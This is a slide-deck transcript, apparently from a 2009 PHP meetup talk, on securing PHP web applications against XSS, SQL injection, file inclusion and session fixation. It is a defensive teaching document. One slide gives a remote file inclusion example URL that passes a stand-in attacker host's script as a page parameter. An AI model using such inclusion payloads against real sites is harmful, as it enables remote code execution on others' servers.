Security In PHP Applications

1.
Security in PHPApplications By: Aditya Mooley Nagpur PHP Meetup August'09

2.
Who Am I?Aditya Mooley ( [email_address] )

3.
Zend Certified PHP5 Engineer

4.
Working with SANIsoftTechnologies since last 6 years

5.
Opensource contributor

6.
Writing secure webapplications

7.
We will discuss... Why Secure

8.
What to Secure

9.
How to Secure

10.
Why secure? PHPis widely used programming language for web

11.
Used by individualsas well as corporates

12.
Handles lot ofcritical and sensitive information

13.
Malicious users canmisuse this information if they get access to it

14.
Secure what? Securecode

15.
Secure database

16.
Secure web server

17.
How to secureFollow some basic guidelines

18.
register_globals is biggestevil. It must be off.

19.
Don't use $_REQUEST.Use individual super globals instead.

20.
Follow Thumb Rule- Filter input

21.
Escape output

22.
Security Issues Inputvalidation

23.
Cross site scripting

24.
SQL Injection

25.
File inclusion

26.
Session fixation

27.
and lot more...

28.
Input Validation Don'ttrust your users

29.
Check every datacoming from user

30.
Use built-in PHPfunctions like - is_int, is_string, is_bool, etc.

31.
ctype_* category offunctions Whitelist over blacklist Check data for what is allowed instead of what is not allowed

32.
Cross site scripting(XSS) XSS is a situation where an attacker can inject a nicely crafted HTML string which when executed on client browser can cause unexpected results.

33.
This may leadto - Session take over.

34.
Setting malicious cookies

35.
Access to restrictedarea

36.
XSS ... Let'ssee an example

37.
XSS can beprevented by escaping the data with – htmlentities() or htmlspecialchars()

38.
Filtering out theHTML tags with strip_tags()

39.
SQL Injection Codeinjection technique to exploit the vulnerability in SQL statements in code.

40.
Can lead to- Removal of data

41.
Access to criticalinformation like passwords Can cause due to - Incorrect filtering of escape characters

42.
Incorrect type handling

43.
SQL Injection ...Example1 , Example2

44.
SQL injection canbe prevented by - mysql_real_escape_string() and similar functions

45.
Typecasting data properlybefore passing to SQL

46.
Using Prepared Statements(MySQLi/PDO)

47.
File Inclusion Atechnique by which an attacker can include a file from remote location or from same server which is not intended for general users

48.
Attacker can getshell access to the server which can be used to any extent.

49.
Such attacks canbe prevented by properly filtering the input data before using it in include statement.

50.
File Inclusion ...Remote File Inclusion http://mysite.com/index.php?page=http://hacker.com/hacker.php Local File Inclusion Attacker can send a relative path which can include a secret file on webserver even out of webroot.

51.
Example .

52.
Session Fixation Throughthis technique, attacker can get access to the valid session of a user.

53.
After this, thereis no way for the website to differentiate between the two.

54.
Attacker can performall the actions that are allowed to the original user.

55.
Example .

56.
Session Fixation ...Session hijacking can be prevented by generating a new session id everytime a user logs in.

57.
This can bedone with session_regenerate_id()

58.
For extra securitydisable the ini setting session.use_trans_sid

59.
Much more Webapplications can be exploited by numerous other ways.

60.
Refer - http://www.phpwact.org/security/risk/catalog

61.
http://www.phpwact.org/security/attack/catalog

62.
References http://www.php.net

63.
http://en.wikipedia.org

64.
http://www.phpwact.org

65.
Examples used inthis presention can be downloaded from http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz

66.
Thanks

Security In PHP Applications

More Related Content

What's hot

Similar to Security In PHP Applications

Recently uploaded

Security In PHP Applications